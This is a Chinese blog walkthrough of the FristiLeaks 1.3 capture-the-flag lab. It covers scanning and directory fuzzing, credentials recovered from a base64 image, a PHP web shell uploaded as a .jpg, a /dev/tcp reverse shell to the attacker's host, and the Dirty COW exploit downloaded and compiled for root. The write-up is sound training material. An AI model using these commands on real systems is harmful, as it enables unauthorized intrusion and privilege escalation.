首页 > 其他分享 >漫游 fristileaks-1-3 靶机

漫游 fristileaks-1-3 靶机

时间:2025-01-04 16:35:05浏览次数:3  
标签:选项 5.143 netdiscover 40839 扫描 192.168 靶机 漫游 fristileaks

Caputure the flag!
ctf

实验

ip addr
netdicover -r 192.168.5.0/24
持续扫描结果

扫描端口
nmap -p- 192.168.5.144
在这里插入图片描述
80端口开放,访问web服务
页面只有基本的信息,查看源码也是一样
在这里插入图片描述
在这里插入图片描述
目录扫描
dirsearch -u 192.168.5.143
dirb -u 192.168.5.143 -w /usr/share/wordlist/dirb/common.txt
在这里插入图片描述
在这里插入图片描述
依次访问
得到的均是这个图片
在这里插入图片描述
可能存在其他路径,进行模糊测试
wfuzz -c -w /usr/share/dirb/wordlists/common.txt -u http://192.168.5.143/FUZZ
在这里插入图片描述
这里经过筛选后也没有结果。结合目标机器名称 fristileaks ,我们考虑可能存在与之相关的路径。
结合 fristileaks 生成字典。
这里选择了 Weakpass 在线网站进行生成
在这里插入图片描述
现在,利用字典再次模糊测试,筛选结果。
wfuzz -c -w pass1.txt --hc 404 -u http://192.168.5.143/FUZZ
在这里插入图片描述
ok,可以看到额外路径 fristi,访问 192.168.5.143/fristi
在这里插入图片描述
登录框,burp 弱口令万能密码跑一下
在这里插入图片描述
这里最好固定用户名为admin,直接爆破密码,也没结果。
在这里插入图片描述

如果是集束炸弹的话,就会相当慢,手动测一下也没有明显的sql注入。
查看页面源代码
在这里插入图片描述
eezeepz 就可能是一个用户名,可以再次尝试sql注入和密码爆破,没有结果,是否密码也和 fristi有关呢。
这里直接关注下一个点,就是base64编码的图片。
直接简单搓一个python解码
在这里插入图片描述
先写到 txt 文件
在这里插入图片描述
再把数据重写到 png 文件
在这里插入图片描述
明显,我们得到一组账号和密码
eezeepz
KeKkeKKeKKeKkEkkEk
在这里插入图片描述
居然是文件上传,死去的记忆开始攻击我。
顺手上传 php 一句话木马。
在这里插入图片描述
直接上传图片,在内容中添加一句话木马和phpinfo。
在这里插入图片描述

访问 /uploads/ctf.php.jpg,解析成功
在这里插入图片描述
不知道为什么蚁剑没有连上

在这里插入图片描述
这次成功连接
在这里插入图片描述
虚拟终端反弹shell
/bin/sh -i >& /dev/tcp/192.168.5.138/8999 0>&1
nc -lvnp 8999
使用python获取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'
在这里插入图片描述
查看内核版本
uname -a
在这里插入图片描述
查找并利用相关内核漏洞 linux 2.6.32
有很多可利用的攻击,尤其是 Dirty COW 攻击。

在这里插入图片描述
下载漏洞,起http服务,下载到目标机,执行

searchsploit -m linux/local/40839.c
cat 40839.c
pyhon -m http.server
cd /tmp
wget 192.168.5.138/40839.c
gcc -pthread 40839.c -o dirty -lcrypt
./dirty
su firefart

查看使用方法
在这里插入图片描述
现在,根据使用方法,创建用户 firefart 后,我​​们将发出su firefart以将用户帐户更改为 root。

在这里插入图片描述

Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it’s supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)

flag

Flag: Y0u_kn0w_y0u_l0ve_fr1st1

ko

补充

本实验其实完全可以不用反弹shell,个人感觉在蚁剑虚拟终端完全可以操作
在这里插入图片描述
在这里插入图片描述
netdiscover
netdiscover 是一个用于网络发现的工具,主要通过 ARP 扫描来发现局域网中的活动主机。它支持主动和被动两种扫描模式。以下是一些常用的 netdiscover 命令及其用法:

基本用法

  • 默认扫描:直接输入 netdiscover 命令,它会自动识别网络接口并开始扫描。
  • 指定网络接口:使用 -i 选项指定网络接口,例如 netdiscover -i eth0
  • 指定 IP 范围:使用 -r 选项指定要扫描的 IP 范围,例如 netdiscover -r 192.168.1.0/24

主动扫描

  • 快速扫描:使用 -f 选项进行快速扫描,例如 netdiscover -i eth0 -f
  • 设置扫描间隔:使用 -s 选项设置每个 ARP 请求之间的间隔时间,例如 netdiscover -s 0.5

被动扫描

  • 被动模式:使用 -p 选项进行被动扫描,只监听 ARP 流量而不发送任何内容,例如 netdiscover -p

其他选项

  • 输出格式:使用 -P 选项生成适合解析的输出格式,并在扫描完成后停止。
  • 持续监听:使用 -L 选项在主动扫描后继续监听 ARP 数据包。

实例

  • 扫描指定网卡和 IP 范围
    netdiscover -i eth0 -r 192.168.1.0/24
    
  • 快速扫描常用局域网地址
    netdiscover -i eth0 -f
    
  • 被动扫描并输出结果
    netdiscover -p
    

这些命令可以帮助你在 Kali Linux 中使用 netdiscover 进行有效的网络发现。

标签:选项,5.143,netdiscover,40839,扫描,192.168,靶机,漫游,fristileaks
From: https://blog.csdn.net/Bulestardemon/article/details/144928688

相关文章

  • HackMyVM-Again靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:Linux(192.168.101.204)物理机:win11(192.168.101.241)靶机启动失败:设置中取......
  • Funbox2靶机(FTP匿名登录、压缩包密码枚举、ssh私钥文件利用)
    一、信息收集1.1.主机发现&端口扫描1.2.目录扫描1.3.敏感信息总结二、漏洞发现2.1.FTP匿名登录2.2.压缩包密码枚举2.3.ssh私钥文件利用2.4.提权三、结语一、信息收集1.1.主机发现&端口扫描nmap使用方法:一篇文章带你理解nmap的使用-nmap使用手册1.2.目录扫描......
  • HackMyVM-Adroit靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian(192.168.101.103)物理机:win11(192.168.101.241)2、使用工具/软件Kal......
  • 漫游 THM-ContainMe-v4 靶机
    Capturetheflag!一、信息收集确认主机ip,扫端口和服务,curl一下得到网页,扫描目录访问web相关页面二、撕口子经过基本的信息收集,暂时没什么思路,进一步观察web页面。查看index.php的源代码后发现提示说明此页面可能存在其他路径进行模糊测试wfuzz-c-w/usr......
  • 联通 路由器 创维SK-WR9551X 联通华盛VS010 组mesh 和 锐捷X32 PRO 无缝漫游
    前言联通路由器:联通创维SK-WR9551X,联通华盛VS010组mesh,并与锐捷X32PRO混合组网,开启无限漫游。1、mesh≠无缝漫游mesh是实现路由器快速组网的一种方式,通过mesh组网后可以实现无缝漫游。mesh组网的设备要求必须是同品牌的才可以。无缝漫游‌是指在无线网络中,无线终端......
  • HackMyVM-Adria靶机的测试报告
    目录一、测试环境1、系统环境2、使用工具/软件二、测试目的三、操作过程1、信息搜集2、Getshell3、提权四、结论一、测试环境1、系统环境渗透机:kali2021.1(192.168.101.127)靶 机:debian/linux(192.168.101.226)注意事项:该类型靶场只能在virtualBox上搭建,因......
  • 搭建dvwa靶机
    #1、直接使用docker搭建方便很多,这个环境依赖问题没必要多花时间去研究;ubuntu安装dockerapt-getupdateapt-getinstallapt-transport-httpsca-certificatescurlgnupglsb-releasecurl-fsSLhttps://download.docker.com/linux/ubuntu/gpg|sudogpg--dearmor-o/usr......
  • DriftingBlues-6靶机渗透
    1.将靶机上传到虚拟机中,使用kali探测靶机IP,与端口 2.访问IP得到页面3.扫描靶机目录获得,进行访问 访问.txt得到 4.访问/textpattern/textpattern,得到一个登录界面,需要爆破5.ffuf-uhttp://192.168.63.132/FUZZ -w/usr/share/dirbuster/wordlists/directory-......
  • 渗透靶机 --- DevGuru
    渗透靶机—DevGuru扫描ip看到这里的ip为162直接访问试试:这里看到页面,继续目录扫描发现存在.git那么就是信息泄露通过工具拉下来另外在目录中,还存在一个后台目录和一个登录窗......
  • Vulnhub靶场-Driftingblues 6靶机(至获取shell)
    靶机安装好后,照例扫描IP端口目录首页为一个图片,没有什么信息访问robots.txt,存在一个textpattern/textpattern目录,我们访问为一个登录窗口,sqlmap无法注入提示我们扫目录时添加.zip扩展名,所以我们使用gobuster来添加扩展名进行扫描扫描到了spammer.zip和spammer......